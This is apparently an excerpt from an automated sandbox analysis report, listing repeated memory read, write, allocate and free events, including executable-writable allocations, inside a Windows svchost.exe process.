| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0d0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 23 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20027, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0d8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 18 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20022, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0e0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 28 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2002c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0e8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 16 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20020, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0f0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0f8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 10 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001a, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a100, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a108, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 20 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20024, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a110, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a118, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a120, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a128, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 19 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20023, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a130, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 20 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20024, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a138, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a140, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a148, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a150, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a158, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 22 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20026, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a160, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a168, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
